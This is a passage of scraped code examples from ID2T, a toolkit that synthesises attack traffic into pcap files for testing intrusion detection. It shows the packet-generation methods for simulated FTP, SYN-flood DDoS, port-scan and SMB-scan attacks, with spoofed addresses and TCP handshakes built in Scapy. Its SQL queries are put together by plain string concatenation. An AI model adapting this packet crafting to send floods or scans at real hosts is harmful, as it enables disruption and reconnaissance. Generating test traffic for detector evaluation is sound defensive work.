        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
        self.packets.append(ftp_buff)
        attacker_seq += len(ftp_tcp.payload)

        # Fin Ack from attacker
        fin_ack_tcp = inet.TCP(sport=ftp_port,
                               dport=sport,
                               seq=attacker_seq,
                               ack=victim_seq,
                               flags='FA',
                               window=attacker_win_value,
                               options=[('MSS', attacker_mss_value)])

        fin_ack = (attacker_ether / attacker_ip / fin_ack_tcp)
        fin_ack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps,
                                                   min_delay)
        self.packets.append(fin_ack)

        # Ack from victim on FTP packet
        ftp_ack_tcp = inet.TCP(sport=sport,
                               dport=ftp_port,
                               seq=victim_seq,
                               ack=attacker_seq,
                               flags='A',
                               window=victim_win_value,
                               options=[('MSS', victim_mss_value)])
        ftp_ack = (victim_ether / victim_ip / ftp_ack_tcp)
        ftp_ack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
        self.packets.append(ftp_ack)

        # Ack from victim on Fin/Ack of attacker
        fin_ack_ack_tcp = inet.TCP(sport=sport,
                                   dport=ftp_port,
                                   seq=victim_seq,
                                   ack=attacker_seq + 1,
                                   flags='A',
                                   window=victim_win_value,
                                   options=[('MSS', victim_mss_value)])
        fin_ack_ack = (victim_ether / victim_ip / fin_ack_ack_tcp)
        fin_ack_ack.time = timestamp_next_pkt
        self.packets.append(fin_ack_ack)
コード例 #28
0
ファイル: DDoSAttack.py プロジェクト: xTikk/ID2T
    def generate_attack_packets(self):
        """
        Creates the attack packets.
        """
        buffer_size = 1000

        # Determine source IP and MAC address
        num_attackers = self.get_param_value(
            atkParam.Parameter.NUMBER_ATTACKERS)
        if (num_attackers is not None) and (num_attackers is not 0):
            # user supplied atkParam.Parameter.NUMBER_ATTACKERS
            # The most used IP class in background traffic
            most_used_ip_class = Util.handle_most_used_outputs(
                self.statistics.get_most_used_ip_class())
            # Create random attackers based on user input atkParam.Parameter.NUMBER_ATTACKERS
            ip_source_list = self.generate_random_ipv4_address(
                most_used_ip_class, num_attackers)
            mac_source_list = self.generate_random_mac_address(num_attackers)
        else:  # user did not supply atkParam.Parameter.NUMBER_ATTACKS
            # use default values for IP_SOURCE/MAC_SOURCE or overwritten values
            # if user supplied any values for those params
            ip_source_list = self.get_param_value(atkParam.Parameter.IP_SOURCE)
            mac_source_list = self.get_param_value(
                atkParam.Parameter.MAC_SOURCE)

        # Make sure IPs and MACs are lists
        if not isinstance(ip_source_list, list):
            ip_source_list = [ip_source_list]

        if not isinstance(mac_source_list, list):
            mac_source_list = [mac_source_list]

        # Generate MACs for each IP that has no corresponding MAC yet
        if (num_attackers is None) or (num_attackers is 0):
            if len(ip_source_list) > len(mac_source_list):
                mac_source_list.extend(
                    self.generate_random_mac_address(
                        len(ip_source_list) - len(mac_source_list)))
            num_attackers = min(len(ip_source_list), len(mac_source_list))

        # Initialize parameters
        self.packets = col.deque(maxlen=buffer_size)

        port_source_list = self.get_param_value(atkParam.Parameter.PORT_SOURCE)
        if not isinstance(port_source_list, list):
            port_source_list = [port_source_list]
        mac_destination = self.get_param_value(
            atkParam.Parameter.MAC_DESTINATION)
        ip_destination = self.get_param_value(
            atkParam.Parameter.IP_DESTINATION)

        most_used_ip_address = self.statistics.get_most_used_ip_address()
        pps = self.get_param_value(atkParam.Parameter.PACKETS_PER_SECOND)
        if pps == 0:
            result = self.statistics.process_db_query(
                "SELECT MAX(maxPktRate) FROM ip_statistics WHERE ipAddress='" +
                ip_destination + "';")
            if result is not None and not 0:
                pps = num_attackers * result
            else:
                result = self.statistics.process_db_query(
                    "SELECT MAX(maxPktRate) FROM ip_statistics WHERE ipAddress='"
                    + most_used_ip_address + "';")
                pps = num_attackers * result

        # Calculate complement packet rates of the background traffic for each interval
        attacker_pps = pps / num_attackers
        complement_interval_attacker_pps = self.statistics.calculate_complement_packet_rates(
            attacker_pps)

        # Check ip.src == ip.dst
        self.ip_src_dst_equal_check(ip_source_list, ip_destination)

        port_destination = self.get_param_value(
            atkParam.Parameter.PORT_DESTINATION)
        if not port_destination:  # user did not define port_dest
            port_destination = self.statistics.process_db_query(
                "SELECT portNumber FROM ip_ports WHERE portDirection='in' AND ipAddress='"
                + ip_destination +
                "' AND portCount==(SELECT MAX(portCount) FROM ip_ports WHERE portDirection='in' AND ipAddress='"
                + ip_destination + "');")
        if not port_destination:  # no port was retrieved
            port_destination = self.statistics.process_db_query(
                "SELECT portNumber FROM (SELECT portNumber, SUM(portCount) as occ FROM ip_ports WHERE "
                "portDirection='in' GROUP BY portNumber ORDER BY occ DESC) WHERE occ=(SELECT SUM(portCount) "
                "FROM ip_ports WHERE portDirection='in' GROUP BY portNumber ORDER BY SUM(portCount) DESC LIMIT 1);"
            )
        if not port_destination:
            port_destination = max(1, int(inet.RandShort()))

        port_destination = Util.handle_most_used_outputs(port_destination)

        self.path_attack_pcap = None

        min_delay, max_delay = self.get_reply_delay(ip_destination)
        victim_buffer = self.get_param_value(atkParam.Parameter.VICTIM_BUFFER)

        attack_duration = self.get_param_value(
            atkParam.Parameter.ATTACK_DURATION)
        pkts_num = int(pps * attack_duration)

        source_win_sizes = self.statistics.get_rnd_win_size(pkts_num)

        destination_win_dist = self.statistics.get_win_distribution(
            ip_destination)
        if len(destination_win_dist) > 0:
            destination_win_prob_dict = lea.Lea.fromValFreqsDict(
                destination_win_dist)
            destination_win_value = destination_win_prob_dict.random()
        else:
            destination_win_value = self.statistics.get_most_used_win_size()

        destination_win_value = Util.handle_most_used_outputs(
            destination_win_value)

        # MSS that was used by IP destination in background traffic
        mss_dst = self.statistics.get_most_used_mss(ip_destination)
        if mss_dst is None:
            mss_dst = self.statistics.get_most_used_mss_value()

        mss_dst = Util.handle_most_used_outputs(mss_dst)

        # Stores triples of (timestamp, source_id, destination_id) for each timestamp.
        # Victim has id=0. Attacker tuple does not need to specify the destination because it's always the victim.
        timestamps_tuples = []
        # For each attacker(id), stores the current source-ports of SYN-packets
        # which still have to be acknowledged by the victim, as a "FIFO" for each attacker
        previous_attacker_port = []
        replies_count = 0
        self.total_pkt_num = 0
        # For each attacker, generate his own packets, then merge all packets
        for attacker in range(num_attackers):
            # Initialize empty port "FIFO" for current attacker
            previous_attacker_port.append([])
            # Calculate timestamp of first SYN-packet of attacker
            timestamp_next_pkt = self.get_param_value(
                atkParam.Parameter.INJECT_AT_TIMESTAMP)
            attack_ends_time = timestamp_next_pkt + attack_duration
            timestamp_next_pkt = rnd.uniform(
                timestamp_next_pkt,
                Util.update_timestamp(timestamp_next_pkt, attacker_pps))
            attacker_pkts_num = int(pkts_num / num_attackers) + rnd.randint(
                0, 100)
            timestamp_prv_reply = 0
            for pkt_num in range(attacker_pkts_num):
                # Stop the attack when it exceeds the duration
                if timestamp_next_pkt > attack_ends_time:
                    break

                # Add timestamp of attacker SYN-packet. Attacker tuples do not need to specify destination
                timestamps_tuples.append((timestamp_next_pkt, attacker + 1))

                # Calculate timestamp of victim ACK-packet
                timestamp_reply = Util.update_timestamp(
                    timestamp_next_pkt, attacker_pps, min_delay)
                while timestamp_reply <= timestamp_prv_reply:
                    timestamp_reply = Util.update_timestamp(
                        timestamp_prv_reply, attacker_pps, min_delay)
                timestamp_prv_reply = timestamp_reply

                # Add timestamp of victim ACK-packet(victim always has id=0)
                timestamps_tuples.append((timestamp_reply, 0, attacker + 1))

                # Calculate timestamp for next attacker SYN-packet
                attacker_pps = max(
                    Util.get_interval_pps(complement_interval_attacker_pps,
                                          timestamp_next_pkt),
                    (pps / num_attackers) / 2)
                timestamp_next_pkt = Util.update_timestamp(
                    timestamp_next_pkt, attacker_pps)

        # Sort timestamp-triples according to their timestamps in ascending order
        timestamps_tuples.sort(key=lambda tmstmp: tmstmp[0])
        self.attack_start_utime = timestamps_tuples[0][0]

        # For each triple, generate packet
        for timestamp in timestamps_tuples:

            # If current current triple is an attacker
            if timestamp[1] != 0:

                attacker_id = timestamp[1] - 1
                # Build request package
                # Select one IP address and its corresponding MAC address
                ip_source = ip_source_list[attacker_id]
                mac_source = mac_source_list[attacker_id]

                # Determine source port
                (port_source,
                 ttl_value) = Util.get_attacker_config(ip_source_list,
                                                       ip_source)

                # If source ports were specified by the user, get random port from specified ports
                if port_source_list[0] != self.default_port:
                    port_source = rnd.choice(port_source_list)

                # Push port of current attacker SYN-packet into port "FIFO" of the current attacker
                # only if victim can still respond, otherwise, memory is wasted
                if replies_count <= victim_buffer:
                    previous_attacker_port[attacker_id].insert(0, port_source)

                request_ether = inet.Ether(dst=mac_destination, src=mac_source)
                request_ip = inet.IP(src=ip_source,
                                     dst=ip_destination,
                                     ttl=ttl_value)
                # Random win size for each packet
                source_win_size = rnd.choice(source_win_sizes)
                request_tcp = inet.TCP(sport=port_source,
                                       dport=port_destination,
                                       flags='S',
                                       ack=0,
                                       window=source_win_size)

                request = (request_ether / request_ip / request_tcp)
                request.time = timestamp[0]
                # Append request
                self.packets.append(request)
                self.total_pkt_num += 1

            # If current triple is the victim
            else:

                # Build reply package
                if replies_count <= victim_buffer:
                    attacker_id = timestamp[2] - 1

                    reply_ether = inet.Ether(src=mac_destination,
                                             dst=mac_source_list[attacker_id])
                    reply_ip = inet.IP(src=ip_destination,
                                       dst=ip_source_list[attacker_id],
                                       flags='DF')
                    # Pop port from attacker's port "FIFO" into destination port
                    reply_tcp = inet.TCP(
                        sport=port_destination,
                        dport=previous_attacker_port[attacker_id].pop(),
                        seq=0,
                        ack=1,
                        flags='SA',
                        window=destination_win_value,
                        options=[('MSS', mss_dst)])
                    reply = (reply_ether / reply_ip / reply_tcp)

                    reply.time = timestamp[0]
                    self.packets.append(reply)
                    replies_count += 1
                    self.total_pkt_num += 1

            # every 1000 packets write them to the pcap file (append)
            if (self.total_pkt_num > 0) and (self.total_pkt_num % buffer_size
                                             == 0) and (len(self.packets) > 0):
                self.last_packet = self.packets[-1]
                self.attack_end_utime = self.last_packet.time
                self.packets = sorted(self.packets, key=lambda pkt: pkt.time)
                self.path_attack_pcap = self.write_attack_pcap(
                    self.packets, True, self.path_attack_pcap)
                self.packets = []
コード例 #29
0
ファイル: PortscanAttack.py プロジェクト: hawk90/ID2T
    def generate_attack_packets(self):
        """
        Creates the attack packets.
        """
        mac_source = self.get_param_value(atkParam.Parameter.MAC_SOURCE)
        mac_destination = self.get_param_value(
            atkParam.Parameter.MAC_DESTINATION)

        # Determine ports
        dest_ports = self.get_param_value(atkParam.Parameter.PORT_DESTINATION)
        if self.get_param_value(atkParam.Parameter.PORT_DEST_ORDER_DESC):
            dest_ports.reverse()
        elif self.get_param_value(atkParam.Parameter.PORT_DEST_SHUFFLE):
            rnd.shuffle(dest_ports)
        if self.get_param_value(atkParam.Parameter.PORT_SOURCE_RANDOMIZE):
            # FIXME: why is sport never used?
            sport = rnd.randint(1, 65535)
        else:
            sport = self.get_param_value(atkParam.Parameter.PORT_SOURCE)

        # Timestamp
        timestamp_next_pkt = self.get_param_value(
            atkParam.Parameter.INJECT_AT_TIMESTAMP)
        # store start time of attack
        self.attack_start_utime = timestamp_next_pkt

        # Initialize parameters
        self.packets = []
        ip_source = self.get_param_value(atkParam.Parameter.IP_SOURCE)
        if isinstance(ip_source, list):
            ip_source = ip_source[0]
        ip_destination = self.get_param_value(
            atkParam.Parameter.IP_DESTINATION)
        if not isinstance(ip_destination, list):
            ip_destination = [ip_destination]

        # Check ip.src == ip.dst
        self.ip_src_dst_catch_equal(ip_source, ip_destination)

        for ip in ip_destination:
            # Select open ports
            ports_open = self.get_param_value(atkParam.Parameter.PORT_OPEN)
            if ports_open == 1:  # user did not specify open ports
                # the ports that were already used by ip.dst (direction in) in the background traffic are open ports
                ports_used_by_ip_dst = self.statistics.process_db_query(
                    "SELECT portNumber FROM ip_ports WHERE portDirection='in' AND ipAddress='"
                    + ip + "'")
                if ports_used_by_ip_dst:
                    ports_open = ports_used_by_ip_dst
                else:  # if no ports were retrieved from database
                    # Take open ports from nmap-service file
                    # ports_temp = self.get_ports_from_nmap_service_dst(100)
                    # ports_open = ports_temp[0:rnd.randint(1,10)]
                    # OR take open ports from the most used ports in traffic statistics
                    ports_open = self.statistics.process_db_query(
                        "SELECT portNumber FROM ip_ports GROUP BY portNumber ORDER BY SUM(portCount) DESC LIMIT "
                        + str(rnd.randint(1, 10)))
            # in case of one open port, convert ports_open to array
            if not isinstance(ports_open, list):
                ports_open = [ports_open]

            # Set MSS (Maximum Segment Size) based on MSS distribution of IP address
            source_mss_dist = self.statistics.get_mss_distribution(ip_source)
            if len(source_mss_dist) > 0:
                source_mss_prob_dict = lea.Lea.fromValFreqsDict(
                    source_mss_dist)
                source_mss_value = source_mss_prob_dict.random()
            else:
                source_mss_value = Util.handle_most_used_outputs(
                    self.statistics.get_most_used_mss_value())
            destination_mss_dist = self.statistics.get_mss_distribution(ip)
            if len(destination_mss_dist) > 0:
                destination_mss_prob_dict = lea.Lea.fromValFreqsDict(
                    destination_mss_dist)
                destination_mss_value = destination_mss_prob_dict.random()
            else:
                destination_mss_value = Util.handle_most_used_outputs(
                    self.statistics.get_most_used_mss_value())

            # Set TTL based on TTL distribution of IP address
            source_ttl_dist = self.statistics.get_ttl_distribution(ip_source)
            if len(source_ttl_dist) > 0:
                source_ttl_prob_dict = lea.Lea.fromValFreqsDict(
                    source_ttl_dist)
                source_ttl_value = source_ttl_prob_dict.random()
            else:
                source_ttl_value = Util.handle_most_used_outputs(
                    self.statistics.get_most_used_ttl_value())
            destination_ttl_dist = self.statistics.get_ttl_distribution(ip)
            if len(destination_ttl_dist) > 0:
                destination_ttl_prob_dict = lea.Lea.fromValFreqsDict(
                    destination_ttl_dist)
                destination_ttl_value = destination_ttl_prob_dict.random()
            else:
                destination_ttl_value = Util.handle_most_used_outputs(
                    self.statistics.get_most_used_ttl_value())

            # Set Window Size based on Window Size distribution of IP address
            source_win_dist = self.statistics.get_win_distribution(ip_source)
            if len(source_win_dist) > 0:
                source_win_prob_dict = lea.Lea.fromValFreqsDict(
                    source_win_dist)
                source_win_value = source_win_prob_dict.random()
            else:
                source_win_value = Util.handle_most_used_outputs(
                    self.statistics.get_most_used_win_size())
            destination_win_dist = self.statistics.get_win_distribution(ip)
            if len(destination_win_dist) > 0:
                destination_win_prob_dict = lea.Lea.fromValFreqsDict(
                    destination_win_dist)
                destination_win_value = destination_win_prob_dict.random()
            else:
                destination_win_value = Util.handle_most_used_outputs(
                    self.statistics.get_most_used_win_size())

            min_delay, max_delay = self.get_reply_latency(ip_source, ip)

            for dport in dest_ports:
                # Parameters changing each iteration
                if self.get_param_value(
                        atkParam.Parameter.IP_SOURCE_RANDOMIZE) and isinstance(
                            ip_source, list):
                    ip_source = rnd.choice(ip_source)

                # 1) Build request package
                request_ether = inet.Ether(src=mac_source, dst=mac_destination)
                request_ip = inet.IP(src=ip_source,
                                     dst=ip,
                                     ttl=source_ttl_value)

                # Random src port for each packet
                sport = rnd.randint(1, 65535)

                request_tcp = inet.TCP(sport=sport,
                                       dport=dport,
                                       window=source_win_value,
                                       flags='S',
                                       options=[('MSS', source_mss_value)])

                request = (request_ether / request_ip / request_tcp)

                request.time = timestamp_next_pkt
                # Append request
                self.packets.append(request)

                # 2) Build reply (for open ports) package
                if dport in ports_open:  # destination port is OPEN
                    reply_ether = inet.Ether(src=mac_destination,
                                             dst=mac_source)
                    reply_ip = inet.IP(src=ip,
                                       dst=ip_source,
                                       ttl=destination_ttl_value,
                                       flags='DF')
                    reply_tcp = inet.TCP(sport=dport,
                                         dport=sport,
                                         seq=0,
                                         ack=1,
                                         flags='SA',
                                         window=destination_win_value,
                                         options=[('MSS',
                                                   destination_mss_value)])
                    reply = (reply_ether / reply_ip / reply_tcp)

                    timestamp_reply = self.timestamp_controller.next_timestamp(
                        latency=min_delay)

                    reply.time = timestamp_reply
                    self.packets.append(reply)

                    # requester confirms
                    confirm_ether = request_ether
                    confirm_ip = request_ip
                    confirm_tcp = inet.TCP(sport=sport,
                                           dport=dport,
                                           seq=1,
                                           window=0,
                                           flags='R')
                    confirm = (confirm_ether / confirm_ip / confirm_tcp)
                    self.timestamp_controller.set_timestamp(timestamp_reply)
                    timestamp_confirm = self.timestamp_controller.next_timestamp(
                        latency=min_delay)
                    confirm.time = timestamp_confirm
                    self.packets.append(confirm)

                    # else: destination port is NOT OPEN -> no reply is sent by target

                self.timestamp_controller.set_timestamp(timestamp_next_pkt)
                timestamp_next_pkt = self.timestamp_controller.next_timestamp()
コード例 #30
0
ファイル: SMBScanAttack.py プロジェクト: xTikk/ID2T
    def generate_attack_packets(self):
        """
        Creates the attack packets.
        """

        pps = self.get_param_value(atkParam.Parameter.PACKETS_PER_SECOND)

        # Calculate complement packet rates of the background traffic for each interval
        complement_interval_pps = self.statistics.calculate_complement_packet_rates(
            pps)

        # Timestamp
        timestamp_next_pkt = self.get_param_value(
            atkParam.Parameter.INJECT_AT_TIMESTAMP)
        # store start time of attack
        self.attack_start_utime = timestamp_next_pkt
        timestamp_prv_reply, timestamp_confirm = 0, 0

        # Initialize parameters
        ip_source = self.get_param_value(atkParam.Parameter.IP_SOURCE)

        dest_ip_count = self.get_param_value(atkParam.Parameter.TARGET_COUNT)
        ip_addr_count = self.statistics.get_ip_address_count()
        if ip_addr_count < dest_ip_count + 1:
            dest_ip_count = ip_addr_count

        # Check for user defined target IP addresses
        ip_destinations = self.get_param_value(
            atkParam.Parameter.IP_DESTINATION)
        if isinstance(ip_destinations, list):
            dest_ip_count = dest_ip_count - len(ip_destinations)
        elif ip_destinations is not "1.1.1.1":
            dest_ip_count = dest_ip_count - 1
            ip_destinations = [ip_destinations]
        else:
            ip_destinations = []

        # Take random targets from pcap
        rnd_ips = self.statistics.get_random_ip_address(dest_ip_count)
        if not isinstance(rnd_ips, list):
            rnd_ips = [rnd_ips]
        ip_destinations = ip_destinations + rnd_ips

        # Make sure the source IP is not part of targets
        if ip_source in ip_destinations and isinstance(ip_destinations, list):
            ip_destinations.remove(ip_source)
        self.add_param_value(atkParam.Parameter.IP_DESTINATION,
                             ip_destinations)

        ip_destinations = self.get_param_value(
            atkParam.Parameter.IP_DESTINATION)

        # Calculate the amount of IP addresses which are hosting SMB
        host_percentage = self.get_param_value(
            atkParam.Parameter.HOSTING_PERCENTAGE)
        rnd_ip_count = len(ip_destinations) * host_percentage

        # Check for user defined IP addresses which are hosting SMB
        hosting_ip = self.get_param_value(atkParam.Parameter.HOSTING_IP)
        if isinstance(hosting_ip, list):
            rnd_ip_count = rnd_ip_count - len(hosting_ip)
        elif hosting_ip is not "1.1.1.1":
            rnd_ip_count = rnd_ip_count - 1
            hosting_ip = [hosting_ip]
        else:
            hosting_ip = []

        hosting_ip = hosting_ip + ip_destinations[:int(rnd_ip_count)]
        self.add_param_value(atkParam.Parameter.HOSTING_IP, hosting_ip)

        # Shuffle targets
        rnd.shuffle(ip_destinations)

        # FIXME: Handle mac addresses correctly
        mac_source = self.get_param_value(atkParam.Parameter.MAC_SOURCE)
        mac_dest = self.get_param_value(atkParam.Parameter.MAC_DESTINATION)

        # Check smb version
        smb_version = self.get_param_value(atkParam.Parameter.PROTOCOL_VERSION)
        if smb_version not in SMBLib.smb_versions:
            SMBLib.invalid_smb_version(smb_version)
        hosting_version = self.get_param_value(
            atkParam.Parameter.HOSTING_VERSION)
        if hosting_version not in SMBLib.smb_versions:
            SMBLib.invalid_smb_version(hosting_version)
        # Check source platform
        src_platform = self.get_param_value(
            atkParam.Parameter.SOURCE_PLATFORM).lower()
        self.packets = []

        # randomize source ports according to platform, if specified
        if self.get_param_value(atkParam.Parameter.PORT_SOURCE_RANDOMIZE):
            sport = Util.generate_source_port_from_platform(src_platform)
        else:
            sport = self.get_param_value(atkParam.Parameter.PORT_SOURCE)

        # No destination IP was specified, but a destination MAC was specified, generate IP that fits MAC
        if isinstance(ip_destinations, list) and isinstance(mac_dest, str):
            ip_destinations = self.statistics.get_ip_address_from_mac(mac_dest)
            if len(ip_destinations) == 0:
                ip_destinations = self.generate_random_ipv4_address(
                    "Unknown", 1)
            # Check ip.src == ip.dst
            self.ip_src_dst_equal_check(ip_source, ip_destinations)

        ip_dests = []
        if isinstance(ip_destinations, list):
            ip_dests = ip_destinations
        else:
            ip_dests.append(ip_destinations)

        if isinstance(ip_dests, list):
            rnd.shuffle(ip_dests)

        # Randomize source IP, if specified
        if self.get_param_value(atkParam.Parameter.IP_SOURCE_RANDOMIZE):
            ip_source = self.generate_random_ipv4_address("Unknown", 1)
            while ip_source in ip_dests:
                ip_source = self.generate_random_ipv4_address("Unknown", 1)
            mac_source = self.statistics.get_mac_address(str(ip_source))
            if len(mac_source) == 0:
                mac_source = self.generate_random_mac_address()

        # Get MSS, TTL and Window size value for source IP
        source_mss_value, source_ttl_value, source_win_value = self.get_ip_data(
            ip_source)

        mac_dests = self.statistics.get_mac_addresses(ip_dests)
        first_timestamp_smb = self.statistics.get_pcap_timestamp_start()[:19]

        # get inject pss
        inject_pps = self.get_param_value(atkParam.Parameter.INJECT_PPS)

        for ip in ip_dests:

            if ip != ip_source:

                # Get destination Mac Address
                mac_destination = ""
                if ip in mac_dests.keys():
                    mac_destination = mac_dests[ip]
                if len(mac_destination) == 0:
                    if isinstance(mac_dest, str):
                        ip_from_mac = self.statistics.get_ip_address_from_mac(
                            mac_dest)
                        if len(ip_from_mac) != 0:
                            ip = ip_from_mac
                            self.ip_src_dst_equal_check(ip_source, ip)
                        mac_destination = mac_dest
                    else:
                        mac_destination = self.generate_random_mac_address()

                # Get MSS, TTL and Window size value for destination IP
                destination_mss_value, destination_ttl_value, destination_win_value = self.get_ip_data(
                    ip)

                min_delay, max_delay = self.get_reply_delay(ip)

                # New connection, new random TCP sequence numbers
                attacker_seq = rnd.randint(1000, 50000)
                victim_seq = rnd.randint(1000, 50000)

                # Randomize source port for each connection if specified
                if self.get_param_value(
                        atkParam.Parameter.PORT_SOURCE_RANDOMIZE):
                    sport = Util.generate_source_port_from_platform(
                        src_platform, sport)

                # 1) Build request package
                request_ether = inet.Ether(src=mac_source, dst=mac_destination)
                request_ip = inet.IP(src=ip_source,
                                     dst=ip,
                                     ttl=source_ttl_value,
                                     flags='DF')
                request_tcp = inet.TCP(sport=sport,
                                       dport=SMBLib.smb_port,
                                       window=source_win_value,
                                       flags='S',
                                       seq=attacker_seq,
                                       options=[('MSS', source_mss_value)])
                attacker_seq += 1
                request = (request_ether / request_ip / request_tcp)
                request.time = timestamp_next_pkt

                # Append request
                self.packets.append(request)

                # Update timestamp for next package
                timestamp_reply = Util.update_timestamp(
                    timestamp_next_pkt,
                    pps,
                    min_delay,
                    inj_pps=inject_pps,
                    inj_timestamp=self.attack_start_utime)
                while timestamp_reply <= timestamp_prv_reply:
                    timestamp_reply = Util.update_timestamp(
                        timestamp_prv_reply,
                        pps,
                        min_delay,
                        inj_pps=inject_pps,
                        inj_timestamp=self.attack_start_utime)
                timestamp_prv_reply = timestamp_reply

                if ip in hosting_ip:

                    # 2) Build TCP packages for ip that hosts SMB

                    # destination sends SYN, ACK
                    reply_ether = inet.Ether(src=mac_destination,
                                             dst=mac_source)
                    reply_ip = inet.IP(src=ip,
                                       dst=ip_source,
                                       ttl=destination_ttl_value,
                                       flags='DF')
                    reply_tcp = inet.TCP(sport=SMBLib.smb_port,
                                         dport=sport,
                                         seq=victim_seq,
                                         ack=attacker_seq,
                                         flags='SA',
                                         window=destination_win_value,
                                         options=[('MSS',
                                                   destination_mss_value)])
                    victim_seq += 1
                    reply = (reply_ether / reply_ip / reply_tcp)
                    reply.time = timestamp_reply
                    self.packets.append(reply)

                    # requester confirms, ACK
                    confirm_ether = request_ether
                    confirm_ip = request_ip
                    confirm_tcp = inet.TCP(sport=sport,
                                           dport=SMBLib.smb_port,
                                           seq=attacker_seq,
                                           ack=victim_seq,
                                           window=source_win_value,
                                           flags='A')
                    confirm = (confirm_ether / confirm_ip / confirm_tcp)
                    timestamp_confirm = Util.update_timestamp(
                        timestamp_reply, pps, min_delay)
                    confirm.time = timestamp_confirm
                    self.packets.append(confirm)

                    # 3) Build SMB Negotiation packets
                    smb_mid = rnd.randint(1, 65535)
                    smb_pid = rnd.randint(1, 65535)
                    smb_req_tail_arr = []
                    smb_req_tail_size = 0

                    # select dialects based on smb version
                    if smb_version is "1":
                        smb_req_dialects = SMBLib.smb_dialects[0:6]
                    else:
                        smb_req_dialects = SMBLib.smb_dialects
                    if len(smb_req_dialects) == 0:
                        smb_req_tail_arr.append(
                            SMBNegociate_Protocol_Request_Tail())
                        smb_req_tail_size = len(
                            SMBNegociate_Protocol_Request_Tail())
                    else:
                        for dia in smb_req_dialects:
                            smb_req_tail_arr.append(
                                SMBNegociate_Protocol_Request_Tail(
                                    BufferData=dia))
                            smb_req_tail_size += len(
                                SMBNegociate_Protocol_Request_Tail(
                                    BufferData=dia))

                    # Creation of SMB Negotiate Protocol Request packet
                    smb_req_head = SMBNegociate_Protocol_Request_Header(
                        Flags2=0x2801,
                        PID=smb_pid,
                        MID=smb_mid,
                        ByteCount=smb_req_tail_size)
                    smb_req_length = len(smb_req_head) + smb_req_tail_size
                    smb_req_net_bio = NBTSession(TYPE=0x00,
                                                 LENGTH=smb_req_length)
                    smb_req_tcp = inet.TCP(sport=sport,
                                           dport=SMBLib.smb_port,
                                           flags='PA',
                                           seq=attacker_seq,
                                           ack=victim_seq)
                    smb_req_ip = inet.IP(src=ip_source,
                                         dst=ip,
                                         ttl=source_ttl_value)
                    smb_req_ether = inet.Ether(src=mac_source,
                                               dst=mac_destination)
                    attacker_seq += len(smb_req_net_bio) + len(
                        smb_req_head) + smb_req_tail_size

                    smb_req_combined = (smb_req_ether / smb_req_ip /
                                        smb_req_tcp / smb_req_net_bio /
                                        smb_req_head)

                    for i in range(0, len(smb_req_tail_arr)):
                        smb_req_combined = smb_req_combined / smb_req_tail_arr[
                            i]

                    timestamp_smb_req = Util.update_timestamp(
                        timestamp_confirm, pps, min_delay)
                    smb_req_combined.time = timestamp_smb_req
                    self.packets.append(smb_req_combined)

                    # destination confirms SMB request package
                    reply_tcp = inet.TCP(sport=SMBLib.smb_port,
                                         dport=sport,
                                         seq=victim_seq,
                                         ack=attacker_seq,
                                         window=destination_win_value,
                                         flags='A')
                    confirm_smb_req = (reply_ether / reply_ip / reply_tcp)
                    timestamp_reply = Util.update_timestamp(
                        timestamp_smb_req, pps, min_delay)
                    confirm_smb_req.time = timestamp_reply
                    self.packets.append(confirm_smb_req)

                    # smb response package
                    first_timestamp = time.mktime(
                        time.strptime(first_timestamp_smb,
                                      "%Y-%m-%d %H:%M:%S"))
                    server_guid, security_blob, capabilities, data_size, server_start_time =\
                        SMBLib.get_smb_platform_data(self.host_os, first_timestamp)

                    timestamp_smb_rsp = Util.update_timestamp(
                        timestamp_reply, pps, min_delay)
                    diff = timestamp_smb_rsp - timestamp_smb_req
                    begin = Util.get_filetime_format(timestamp_smb_req +
                                                     diff * 0.1)
                    end = Util.get_filetime_format(timestamp_smb_rsp -
                                                   diff * 0.1)
                    system_time = rnd.randint(begin, end)

                    # Creation of SMB Negotiate Protocol Response packets
                    if smb_version is not "1" and hosting_version is not "1":
                        smb_rsp_packet = SMB2.SMB2_SYNC_Header(Flags=1)
                        smb_rsp_negotiate_body =\
                            SMB2.SMB2_Negotiate_Protocol_Response(DialectRevision=0x02ff, SecurityBufferOffset=124,
                                                                  SecurityBufferLength=len(security_blob),
                                                                  SecurityBlob=security_blob, Capabilities=capabilities,
                                                                  MaxTransactSize=data_size, MaxReadSize=data_size,
                                                                  MaxWriteSize=data_size, SystemTime=system_time,
                                                                  ServerStartTime=server_start_time,
                                                                  ServerGuid=server_guid)
                        smb_rsp_length = len(smb_rsp_packet) + len(
                            smb_rsp_negotiate_body)
                    else:
                        smb_rsp_packet =\
                            SMBNegociate_Protocol_Response_Advanced_Security(Start="\xffSMB", PID=smb_pid, MID=smb_mid,
                                                                             DialectIndex=5, SecurityBlob=security_blob)
                        smb_rsp_length = len(smb_rsp_packet)
                    smb_rsp_net_bio = NBTSession(TYPE=0x00,
                                                 LENGTH=smb_rsp_length)
                    smb_rsp_tcp = inet.TCP(sport=SMBLib.smb_port,
                                           dport=sport,
                                           flags='PA',
                                           seq=victim_seq,
                                           ack=attacker_seq)
                    smb_rsp_ip = inet.IP(src=ip,
                                         dst=ip_source,
                                         ttl=destination_ttl_value)
                    smb_rsp_ether = inet.Ether(src=mac_destination,
                                               dst=mac_source)
                    victim_seq += len(smb_rsp_net_bio) + len(smb_rsp_packet)
                    if smb_version is not "1" and hosting_version is not "1":
                        victim_seq += len(smb_rsp_negotiate_body)

                    smb_rsp_combined = (smb_rsp_ether / smb_rsp_ip /
                                        smb_rsp_tcp / smb_rsp_net_bio /
                                        smb_rsp_packet)
                    if smb_version is not "1" and hosting_version is not "1":
                        smb_rsp_combined = (smb_rsp_combined /
                                            smb_rsp_negotiate_body)

                    smb_rsp_combined.time = timestamp_smb_rsp
                    self.packets.append(smb_rsp_combined)

                    # source confirms SMB response package
                    confirm_tcp = inet.TCP(sport=sport,
                                           dport=SMBLib.smb_port,
                                           seq=attacker_seq,
                                           ack=victim_seq,
                                           window=source_win_value,
                                           flags='A')
                    confirm_smb_res = (confirm_ether / confirm_ip /
                                       confirm_tcp)
                    timestamp_confirm = Util.update_timestamp(
                        timestamp_smb_rsp, pps, min_delay)
                    confirm_smb_res.time = timestamp_confirm
                    self.packets.append(confirm_smb_res)

                    # attacker sends FIN ACK
                    confirm_tcp = inet.TCP(sport=sport,
                                           dport=SMBLib.smb_port,
                                           seq=attacker_seq,
                                           ack=victim_seq,
                                           window=source_win_value,
                                           flags='FA')
                    source_fin_ack = (confirm_ether / confirm_ip / confirm_tcp)
